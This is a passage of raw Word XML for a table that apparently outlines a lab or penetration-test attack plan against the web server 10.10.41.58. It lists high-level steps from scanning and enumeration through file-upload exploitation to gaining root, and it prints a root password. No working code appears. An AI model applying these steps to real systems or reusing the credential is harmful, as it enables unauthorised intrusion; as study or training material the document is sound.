          <w:trHeight w:val="675"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1885" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="2C273758" w14:textId="0C4AB17B" w:rsidR="00E075C5" w:rsidRDefault="00E075C5" w:rsidP="00F71C0E">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:br/>
              <w:t>Objective</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="7AF0C1AB" w14:textId="2762E576" w:rsidR="00E075C5" w:rsidRDefault="00957FF4" w:rsidP="00A30E91">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidR="00E075C5">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Targe</w:t>
            </w:r>
            <w:r w:rsidR="006D2781">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>t</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5665" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="7782F96A" w14:textId="4A6E0CE0" w:rsidR="00E075C5" w:rsidRDefault="00E075C5" w:rsidP="00A30E91">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:br/>
              <w:t>Steps</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E075C5" w14:paraId="3FAA5842" w14:textId="77777777" w:rsidTr="00CC5D79">
        <w:trPr>
          <w:trHeight w:val="2092"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1885" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="17365D" w:themeFill="text2" w:themeFillShade="BF"/>
          </w:tcPr>
          <w:p w14:paraId="0DE2472C" w14:textId="0CC6B80B" w:rsidR="00E075C5" w:rsidRPr="00E075C5" w:rsidRDefault="00CC5D79" w:rsidP="00CA5537">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidR="00E075C5" w:rsidRPr="00E075C5">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Gain Remote Access </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1800" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1EEFDDD6" w14:textId="02EC2C4F" w:rsidR="00E075C5" w:rsidRPr="00647613" w:rsidRDefault="00E075C5" w:rsidP="00F71C0E">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00647613">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>10.10.41.58</w:t>
            </w:r>
            <w:r w:rsidRPr="00647613">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:br/>
              <w:t>Web Server</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5665" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0B31496A" w14:textId="30E87A89" w:rsidR="00E075C5" w:rsidRPr="00957FF4" w:rsidRDefault="006F526B" w:rsidP="00BF2874">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="14"/>
              </w:numPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00957FF4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Network </w:t>
            </w:r>
            <w:r w:rsidR="00DF7260" w:rsidRPr="00957FF4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Service </w:t>
            </w:r>
            <w:r w:rsidRPr="00957FF4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Scanning and Port Enumeration</w:t>
            </w:r>
            <w:r w:rsidR="002E0B9F" w:rsidRPr="00957FF4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7066DF3C" w14:textId="374FFDB5" w:rsidR="006F526B" w:rsidRPr="00957FF4" w:rsidRDefault="006F526B" w:rsidP="00BF2874">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="14"/>
              </w:numPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00957FF4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Subdomain</w:t>
            </w:r>
            <w:r w:rsidR="00AD3E27" w:rsidRPr="00957FF4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>s and VHOST</w:t>
            </w:r>
            <w:r w:rsidRPr="00957FF4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00A25886" w:rsidRPr="00957FF4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Enumeration.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="37F15270" w14:textId="005BBF00" w:rsidR="001C1EA3" w:rsidRPr="00957FF4" w:rsidRDefault="006F526B" w:rsidP="00BF2874">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="14"/>
              </w:numPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00957FF4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Web Application Enumeration </w:t>
            </w:r>
            <w:r w:rsidR="00782EAB" w:rsidRPr="00957FF4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">by </w:t>
            </w:r>
            <w:r w:rsidR="00DD56C8" w:rsidRPr="00957FF4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">  - </w:t>
            </w:r>
            <w:r w:rsidR="001C1EA3" w:rsidRPr="00957FF4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Guessing</w:t>
            </w:r>
            <w:r w:rsidR="00BF1CEE" w:rsidRPr="00957FF4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> File</w:t>
            </w:r>
            <w:r w:rsidR="002E0B9F" w:rsidRPr="00957FF4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00A25886" w:rsidRPr="00957FF4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>names,</w:t>
            </w:r>
            <w:r w:rsidR="00BF1CEE" w:rsidRPr="00957FF4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="009127DA" w:rsidRPr="00957FF4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Endpoints,</w:t>
            </w:r>
            <w:r w:rsidR="00BF1CEE" w:rsidRPr="00957FF4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="009127DA" w:rsidRPr="00957FF4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Login</w:t>
            </w:r>
            <w:r w:rsidR="00966390" w:rsidRPr="00957FF4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">     </w:t>
            </w:r>
            <w:r w:rsidR="00A25886" w:rsidRPr="00957FF4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Portals,</w:t>
            </w:r>
            <w:r w:rsidR="009127DA" w:rsidRPr="00957FF4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> Hidden parameters </w:t>
            </w:r>
            <w:r w:rsidR="00BB322F" w:rsidRPr="00957FF4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">  -</w:t>
            </w:r>
            <w:r w:rsidR="0014585A" w:rsidRPr="00957FF4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> Identifying</w:t>
            </w:r>
            <w:r w:rsidR="0078153C" w:rsidRPr="00957FF4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="005318E8" w:rsidRPr="00957FF4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Sensitive,</w:t>
            </w:r>
            <w:r w:rsidR="0014585A" w:rsidRPr="00957FF4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="0078153C" w:rsidRPr="00957FF4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Insecure &amp; Outdate Components</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3395A9C6" w14:textId="53722DE4" w:rsidR="0014585A" w:rsidRPr="00957FF4" w:rsidRDefault="0014585A" w:rsidP="00BF2874">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="14"/>
              </w:numPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00957FF4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Exploit Wrong </w:t>
            </w:r>
            <w:r w:rsidR="007C6001" w:rsidRPr="00957FF4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Implementation</w:t>
            </w:r>
            <w:r w:rsidRPr="00957FF4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> of File Upload </w:t>
            </w:r>
            <w:r w:rsidRPr="00957FF4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">Functionality </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5AED410E" w14:textId="004411F1" w:rsidR="007C6001" w:rsidRPr="00957FF4" w:rsidRDefault="007C6001" w:rsidP="00BF2874">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="14"/>
              </w:numPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00957FF4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Upload Malicious File and Take Control on Server</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3CD12CA4" w14:textId="584584AC" w:rsidR="00DD56C8" w:rsidRPr="00DF7260" w:rsidRDefault="00DD56C8" w:rsidP="00DD56C8">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00647613" w14:paraId="48256053" w14:textId="77777777" w:rsidTr="00CC5D79">
        <w:trPr>
          <w:trHeight w:val="1791"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1885" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="17365D" w:themeFill="text2" w:themeFillShade="BF"/>
          </w:tcPr>
          <w:p w14:paraId="27DDC48E" w14:textId="1508308A" w:rsidR="00647613" w:rsidRPr="00E075C5" w:rsidRDefault="00CC5D79" w:rsidP="00647613">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidR="00647613" w:rsidRPr="00E075C5">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Get root Access on Web Server</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1800" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="166596D7" w14:textId="26B5A079" w:rsidR="00647613" w:rsidRPr="00647613" w:rsidRDefault="00647613" w:rsidP="00647613">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00647613">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>10.10.41.58</w:t>
            </w:r>
            <w:r w:rsidRPr="00647613">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:br/>
              <w:t>Web Server</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5665" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7891C8CE" w14:textId="2ED6A05F" w:rsidR="001E44FE" w:rsidRPr="00957FF4" w:rsidRDefault="001E44FE" w:rsidP="00BF2874">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="14"/>
              </w:numPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00957FF4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Try to find </w:t>
            </w:r>
            <w:r w:rsidR="00417243" w:rsidRPr="00957FF4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Internal </w:t>
            </w:r>
            <w:r w:rsidR="004D55CD" w:rsidRPr="00957FF4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Deployment Misconfiguration</w:t>
            </w:r>
            <w:r w:rsidR="005318E8" w:rsidRPr="00957FF4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0818E028" w14:textId="678977A1" w:rsidR="005318E8" w:rsidRPr="00957FF4" w:rsidRDefault="00417243" w:rsidP="00BF2874">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="14"/>
              </w:numPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00957FF4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Tr</w:t>
            </w:r>
            <w:r w:rsidR="00C92A3F" w:rsidRPr="00957FF4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>y</w:t>
            </w:r>
            <w:r w:rsidRPr="00957FF4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">  to</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00957FF4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> Attack </w:t>
            </w:r>
            <w:r w:rsidR="00C92A3F" w:rsidRPr="00957FF4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Outdated </w:t>
            </w:r>
            <w:r w:rsidR="009D70A6" w:rsidRPr="00957FF4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Components</w:t>
            </w:r>
            <w:r w:rsidR="00C92A3F" w:rsidRPr="00957FF4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:br/>
              <w:t>Packages ,Kernel Versions</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3D5C1C93" w14:textId="4A648F95" w:rsidR="005318E8" w:rsidRPr="00957FF4" w:rsidRDefault="009D70A6" w:rsidP="00BF2874">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="14"/>
              </w:numPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00957FF4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Hunt on Sensitive Files, Memory Cached Credentials.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="11C0F62B" w14:textId="7748E421" w:rsidR="005318E8" w:rsidRPr="00957FF4" w:rsidRDefault="009D70A6" w:rsidP="00BF2874">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="14"/>
              </w:numPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00957FF4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Found Clear text Password on Bash History</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="01CA477E" w14:textId="00C92BB6" w:rsidR="00647613" w:rsidRDefault="00D173C3" w:rsidP="00BF2874">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="14"/>
              </w:numPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00957FF4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Get r00t! access with </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00957FF4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Password:pass</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00957FF4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>281@1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00647613" w14:paraId="04E47516" w14:textId="77777777" w:rsidTr="00CC5D79">
        <w:trPr>
          <w:trHeight w:val="2575"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1885" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="17365D" w:themeFill="text2" w:themeFillShade="BF"/>
          </w:tcPr>
          <w:p w14:paraId="7DA376BF" w14:textId="26746EF9" w:rsidR="00647613" w:rsidRDefault="00CC5D79" w:rsidP="00825BFC">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
